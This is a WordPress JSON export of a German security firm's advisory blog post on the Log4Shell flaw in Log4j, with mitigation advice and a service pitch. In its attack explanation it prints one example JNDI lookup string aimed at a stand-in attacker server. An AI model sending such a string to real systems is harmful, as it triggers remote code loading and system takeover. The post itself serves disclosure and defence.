{"id":1098,"date":"2021-12-20T11:04:16","date_gmt":"2021-12-20T10:04:16","guid":{"rendered":"https:\/\/blog.net-e.de\/?p=1098"},"modified":"2022-03-30T12:49:50","modified_gmt":"2022-03-30T10:49:50","slug":"warnstufe-rot-zero-day-exploit-in-log4j","status":"publish","type":"post","link":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/","title":{"rendered":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j"},"content":{"rendered":"<p>Zum zweiten Mal in diesem Jahr hat das BSI die h\u00f6chste Alarmstufe \u201eRot\u201c ausgerufen. Betroffen ist die kritische Schwachstelle namens Log4Shell in der verbreiteten Java-Logging-Bibliothek Log4j.<br>Gef\u00e4hrlich ist die Schwachstelle zum einen, weil bereits ein Proof of Concept (PoC) \u00f6ffentlich verf\u00fcgbar ist und zum anderen, weil die Java-Bibliothek ein weit verbreitetes Produkt ist, welches sich in vielen weiteren Anwendungen wiederfindet. Au\u00dferdem ist ein Angriff mit geringem Aufwand m\u00f6glich. Die erfolgreiche Ausnutzung dieser Schwachstelle erm\u00f6glicht die vollst\u00e4ndige \u00dcbernahme des Zielsystems.<\/p>\n\n\n\n<p><strong>Wie gehen Angreifer vor?<\/strong><br>Log4j zeichnet Meldungen auf, damit diese sp\u00e4ter nachvollzogen werden k\u00f6nnen. Unter bestimmten Umst\u00e4nden werden die in die Log-Datei geschriebenen Zeichenketten auch interpretiert, um zus\u00e4tzliche Informationen zur Konfiguration hinzuf\u00fcgen zu k\u00f6nnen. Die Angreifer senden eine manipulierte HTTP-Anfrage an das verwundbare Zielsystem. Die Anfrage enth\u00e4lt bestimmte Parameter und die Domain des Servers, der vom Angreifer kontrolliert wird. Aufgrund der genutzten Parameter wird versucht, weitere Informationen von dem Server des Angreifers zu laden. So k\u00f6nnen alle Arten von Schadsoftware auf dem verwundbaren System abgelegt und ausgef\u00fchrt werden.<\/p>\n\n\n\n<p>Eine m\u00f6gliche Anfrage sieht wie folgt aus:<br>${jndi:ldap:\/\/angreifer.server.de\/x}<\/p>\n\n\n\n<p><strong>Was k\u00f6nnen Betroffene tun?<br><\/strong>Zun\u00e4chst muss \u00fcberpr\u00fcft werden welche Third-Party-Software, die Sie nutzen, betroffen ist. Einen ersten \u00dcberblick k\u00f6nnen Sie sich <a href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\" title=\"Liste betroffener Systeme\" target=\"_blank\" rel=\"noreferrer noopener\">hier<\/a> verschaffen. Wurde eine betroffene Anwendung entdeckt, sollten Sie beim Hersteller nach Updates oder Workarounds suchen und diese umsetzen.<br>F\u00fcr die Log4j-Bibliothek gibt es bereits ein Update, das umgehend installiert werden sollte, wenn eigene Applikationen mit Log4j eingesetzt werden. Weitere Ma\u00dfnahmen k\u00f6nnen das Blockieren von bereits bekannten b\u00f6sartigen IP-Adressen auf der Firewall oder das Blockieren von gef\u00e4hrlichen Zeichenketten auf einer Web Application Firewall (WAF) sein. Zus\u00e4tzlich sollte das Monitoring erh\u00f6ht werden, um die Systeme angemessen \u00fcberwachen zu k\u00f6nnen.<\/p>\n\n\n\n<p>Sicherheitsforscher gehen davon aus, dass uns diese Sicherheitsl\u00fccke noch Monate, wenn nicht sogar Jahre verfolgen wird. Mithilfe sogenannter Backdoors bauen sich Kriminelle eine Hintert\u00fcr in das System, um bei Bedarf erneuten Zugriff zu erhalten. So kann es dazu kommen, dass zun\u00e4chst nichts passiert und es erst nach Monaten zu L\u00f6segeldforderungen kommt. &nbsp;<\/p>\n\n\n\n<p>Wie die letzten Monate zeigen, nehmen schwerwiegende Sicherheitsvorf\u00e4lle wie dieser immer mehr zu. Mithilfe von regelm\u00e4\u00dfigen Schwachstellenanalyse k\u00f6nnen Sie Ihre IT-Infrastruktur st\u00e4rken und Ausf\u00e4lle vermeiden. <br><\/p>\n\n\n\n<p>Wir helfen Ihnen gerne bei Ihren Fragen weiter.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/net-e.de\/en\/services.html\/\"><img decoding=\"async\" src=\"https:\/\/blog.net-e.de\/wp-content\/uploads\/2021\/12\/Schwachstellenanalyse_Net.e-1024x449.png\" alt=\"\" class=\"wp-image-1101\"\/><\/a><\/figure>\n\n\n\n<p>Quelle: https:\/\/www.microsoft.com\/security\/blog\/2021\/12\/11\/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation<\/p>","protected":false},"excerpt":{"rendered":"<p>Zum zweiten Mal in diesem Jahr hat das BSI die h\u00f6chste Alarmstufe \u201eRot\u201c ausgerufen. Betroffen ist die kritische Schwachstelle namens Log4Shell in der verbreiteten Java-Logging-Bibliothek Log4j.Gef\u00e4hrlich ist die Schwachstelle zum einen, weil bereits ein Proof of Concept (PoC) \u00f6ffentlich verf\u00fcgbar ist und zum anderen, weil die Java-Bibliothek ein weit verbreitetes Produkt ist, welches sich in [&#8230;]<\/p>\n<p><a class=\"btn btn-post-read-more mt-5 p-0 d-flex justify-content-center align-items-center\" href=\"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/\"><span class=\"ml-auto\">Vollst\u00e4ndiger Bericht<\/span> <span class=\"read-more-inner position-relative ml-auto\"><br \/>\n\t\t\t<svg class=\"position-absolute arrow-down\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"13.707\" height=\"16.707\" viewBox=\"0 0 13.707 16.707\">\n\t\t\t  <g id=\"ic-roundabout-forward\" transform=\"translate(13.351 -10) rotate(90)\">\n\t\t\t    <path id=\"Pfad_31444\" data-name=\"Pfad 31444\" d=\"M454,.36l6.5,6.4-6.5,6.6\" transform=\"translate(-434.5 -0.36)\" fill=\"none\" stroke=\"#fff\" stroke-miterlimit=\"10\" stroke-width=\"1\"\/>\n\t\t\t    <line id=\"Linie_35\" data-name=\"Linie 35\" x1=\"16\" transform=\"translate(10 6.5)\" fill=\"none\" stroke=\"#fff\" stroke-miterlimit=\"10\" stroke-width=\"1\"\/>\n\t\t\t  <\/g>\n\t\t\t<\/svg><br \/>\n\t\t\t<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":1515,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,107,95],"tags":[17,327,53,328],"class_list":["post-1098","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-allgemein","category-cyberkriminalitaet","category-sicherheitsluecken","tag-it-sicherheit","tag-log4shell","tag-sicherheitsluecke","tag-zero-day-exploit"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e<\/title>\n<meta name=\"description\" content=\"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e\" \/>\n<meta property=\"og:description\" content=\"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/\" \/>\n<meta property=\"og:site_name\" content=\"net.e\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-20T10:04:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-03-30T10:49:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"760\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Jennifer Deutscher\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jennifer Deutscher\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/\"},\"author\":{\"name\":\"Jennifer Deutscher\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#\\\/schema\\\/person\\\/17d3120c2bd3a145ba307682dba48d88\"},\"headline\":\"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j\",\"datePublished\":\"2021-12-20T10:04:16+00:00\",\"dateModified\":\"2022-03-30T10:49:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/\"},\"wordCount\":425,\"publisher\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/hack-813290_1280-760x380-1.jpg\",\"keywords\":[\"IT-Sicherheit\",\"Log4Shell\",\"Sicherheitsl\u00fccke\",\"Zero-Day-Exploit\"],\"articleSection\":[\"Allgemein\",\"Cyberkriminalit\u00e4t\",\"Sicherheitsl\u00fccken\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/\",\"url\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/\",\"name\":\"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/hack-813290_1280-760x380-1.jpg\",\"datePublished\":\"2021-12-20T10:04:16+00:00\",\"dateModified\":\"2022-03-30T10:49:50+00:00\",\"description\":\"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#primaryimage\",\"url\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/hack-813290_1280-760x380-1.jpg\",\"contentUrl\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/hack-813290_1280-760x380-1.jpg\",\"width\":760,\"height\":380},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/warnstufe-rot-zero-day-exploit-in-log4j\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/net-e.de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/net-e.de\\\/en\\\/\",\"name\":\"net.e\",\"description\":\"net.e - unabh\u00e4ngige IT Beratung aus Aurich\",\"publisher\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/net-e.de\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#organization\",\"name\":\"net.e - Network Experts GmbH\",\"url\":\"https:\\\/\\\/net-e.de\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/03\\\/nete-network-experts-logo-Kopie.png\",\"contentUrl\":\"https:\\\/\\\/net-e.de\\\/wp-content\\\/uploads\\\/2022\\\/03\\\/nete-network-experts-logo-Kopie.png\",\"width\":4744,\"height\":2680,\"caption\":\"net.e - Network Experts GmbH\"},\"image\":{\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/net-e.de\\\/en\\\/#\\\/schema\\\/person\\\/17d3120c2bd3a145ba307682dba48d88\",\"name\":\"Jennifer Deutscher\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g\",\"caption\":\"Jennifer Deutscher\"},\"url\":\"https:\\\/\\\/net-e.de\\\/en\\\/author\\\/jdeutscher\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e","description":"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/","og_locale":"en_US","og_type":"article","og_title":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e","og_description":"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.","og_url":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/","og_site_name":"net.e","article_published_time":"2021-12-20T10:04:16+00:00","article_modified_time":"2022-03-30T10:49:50+00:00","og_image":[{"width":760,"height":380,"url":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","type":"image\/jpeg"}],"author":"Jennifer Deutscher","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jennifer Deutscher","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#article","isPartOf":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/"},"author":{"name":"Jennifer Deutscher","@id":"https:\/\/net-e.de\/en\/#\/schema\/person\/17d3120c2bd3a145ba307682dba48d88"},"headline":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j","datePublished":"2021-12-20T10:04:16+00:00","dateModified":"2022-03-30T10:49:50+00:00","mainEntityOfPage":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/"},"wordCount":425,"publisher":{"@id":"https:\/\/net-e.de\/en\/#organization"},"image":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#primaryimage"},"thumbnailUrl":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","keywords":["IT-Sicherheit","Log4Shell","Sicherheitsl\u00fccke","Zero-Day-Exploit"],"articleSection":["Allgemein","Cyberkriminalit\u00e4t","Sicherheitsl\u00fccken"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/","url":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/","name":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j | net.e","isPartOf":{"@id":"https:\/\/net-e.de\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#primaryimage"},"image":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#primaryimage"},"thumbnailUrl":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","datePublished":"2021-12-20T10:04:16+00:00","dateModified":"2022-03-30T10:49:50+00:00","description":"Mit IT-Sicherheit zum Erfolg! Wir sind Experten im Bereich IT-Sicherheit und sch\u00fctzen Ihr Unternehmen vor Cyberangriffen.","breadcrumb":{"@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#primaryimage","url":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","contentUrl":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","width":760,"height":380},{"@type":"BreadcrumbList","@id":"https:\/\/net-e.de\/en\/warnstufe-rot-zero-day-exploit-in-log4j\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/net-e.de\/"},{"@type":"ListItem","position":2,"name":"Warnstufe \u201eRot\u201c : Zero-Day-Exploit in Log4j"}]},{"@type":"WebSite","@id":"https:\/\/net-e.de\/en\/#website","url":"https:\/\/net-e.de\/en\/","name":"net.e","description":"net.e - unabh\u00e4ngige IT Beratung aus Aurich","publisher":{"@id":"https:\/\/net-e.de\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/net-e.de\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/net-e.de\/en\/#organization","name":"net.e - Network Experts GmbH","url":"https:\/\/net-e.de\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/net-e.de\/en\/#\/schema\/logo\/image\/","url":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/03\/nete-network-experts-logo-Kopie.png","contentUrl":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/03\/nete-network-experts-logo-Kopie.png","width":4744,"height":2680,"caption":"net.e - Network Experts GmbH"},"image":{"@id":"https:\/\/net-e.de\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/net-e.de\/en\/#\/schema\/person\/17d3120c2bd3a145ba307682dba48d88","name":"Jennifer Deutscher","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/34bcb3db70abbc16ef071ce6e2509ddddf38916103c14b4dc691fb1e3641b8f3?s=96&d=mm&r=g","caption":"Jennifer Deutscher"},"url":"https:\/\/net-e.de\/en\/author\/jdeutscher\/"}]}},"jetpack_featured_media_url":"https:\/\/net-e.de\/wp-content\/uploads\/2022\/02\/hack-813290_1280-760x380-1.jpg","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/posts\/1098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/comments?post=1098"}],"version-history":[{"count":1,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/posts\/1098\/revisions"}],"predecessor-version":[{"id":1518,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/posts\/1098\/revisions\/1518"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/media\/1515"}],"wp:attachment":[{"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/media?parent=1098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/categories?post=1098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/net-e.de\/en\/wp-json\/wp\/v2\/tags?post=1098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}